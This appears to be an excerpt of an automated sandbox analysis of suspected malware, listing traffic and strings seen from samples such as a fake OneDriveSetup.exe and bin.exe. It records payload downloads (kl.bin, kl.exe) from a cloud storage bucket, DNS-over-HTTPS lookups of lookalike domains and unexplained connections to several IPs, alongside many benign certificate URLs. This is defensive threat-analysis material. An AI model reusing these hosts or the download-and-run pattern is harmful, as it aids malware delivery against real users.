                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 35.227.223.56
                Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
                Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
                Source: unknownTCP traffic detected without corresponding DNS query: 183.60.146.66
                Source: unknownTCP traffic detected without corresponding DNS query: 143.92.56.59
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006615A5 URLDownloadToFileW,URLDownloadToCacheFileW,DeleteFileW,9_2_006615A5
                Source: global trafficHTTP traffic detected: GET /kl.bin HTTP/1.1Host: aa-1348336590.cos.ap-hongkong.myqcloud.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /kl.exe HTTP/1.1Host: aa-1348336590.cos.ap-hongkong.myqcloud.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: Yzc2OWMzNWYtODlkMC00NQ==Origin: ws://ws-ap1.pusher.com
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: os/exec.Command(]. new data: GID[^/app([0-9]+)/app^created by (.+)$bad TinySizeClassbad key algorithmbad local addressboundBindToDeviceclose dns channelconnectingAddresscorkOptionEnableddecryption failedduplicate addresseffectiveNetProtoentersyscallblockexec apiAgent GIDexec apiAgent RIDexec deleteRegDirexec format errorexec nicIndexToIPexec phyNIC Indexexec phyNIC SetIPexec tapIFCE Nameexec: killing Cmdexec: not startedfractional secondframe_ping_lengthg already scannedget up-going ACK glEdgeFlagPointerglPopClientAttribglTexCoordPointergp.waiting != nilhandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid BMPStringinvalid IA5Stringinvalid bit size invalid stream IDip2if func returnipv6-only networkisConnectNotifiedjoyReleaseCapturekey align too biglocked m0 woke upmark - bad statusmarkBits overflowmciGetCreatorTaskmessage too largemidiInGetDevCapsWmidiOutGetNumDevsmidiStreamRestartmissing closing )missing closing ]missing extensionmixerGetLineInfoWmultipartmaxpartsneed re-resolve: nextId too large:nil resource bodyno available Datano data availablenoChecksumEnablednotetsleepg on g0old node version:operation abortedparameter problempermission deniedpkg/buffer.Bufferpkg/sleep.Sleeperpkg/tcpip.Addresspppoe instanceId:protect fd failedreceiveBufferSizereceiveTOSEnabledreceiveTTLEnabledreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of remoteAddr is nilruntime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0seeker can't seekselect (no cases)set sdk loglevel:set tap static ipstack: frame={sp:start map checkerstart refresh infswept cached spansync.RWMutex.Lockthread exhaustiontimeGetSystemTimetransfer-encodingtruncated headersudp routines num:unknown caller pcunknown hostname:unknown type kindunrecognized nameupdate dns dialeruse gid:%s rid:%swait for GC cyclewaveInGetDevCapsWwaveInGetPositionwaveOutGetNumDevswebsocket: close wglGetPixelFormatwglGetProcAddresswglSetPixelFormatwine_get_versionwrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: aa-1348336590.cos.ap-hongkong.myqcloud.com
                Source: global trafficDNS traffic detected: DNS query: www.baidu.com
                Source: global trafficDNS traffic detected: DNS query: ws-ap1.pusher.com
                Source: global trafficDNS traffic detected: DNS query: www.yandex.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: in.appcenter.ms
                Source: global trafficDNS traffic detected: DNS query: nal.fqoqehwib.com
                Source: global trafficDNS traffic detected: DNS query: nit.crash1ytics.com
                Source: global trafficDNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net
                Source: global trafficDNS traffic detected: DNS query: chr.alipayassets.com
                Source: unknownHTTP traffic detected: POST /logs?api-version=1.0.0 HTTP/1.1App-Secret: 5b3d0aea-eb78-41e4-bd41-80da14e98e58Install-ID: 336fab04-90f8-43c8-9867-f5969890c615Content-Type: application/json; charset=utf-8Host: in.appcenter.msContent-Length: 570Expect: 100-continueConnection: Keep-Alive
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0#
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: svchost.exe, 00000001.00000002.3072123314.000001B0AE686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-2011a.crl03
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-2011a.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0B
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/AppMenuDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/AppMenuDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ButtonDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ButtonDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/WindowDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/Themes/WindowDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/app.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/LetsPRO;component/app.xamld
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/imi/ns/identity-200903
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/CancelT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/IssueT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/RenewT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT-Cancel
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Validate
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/ValidateT
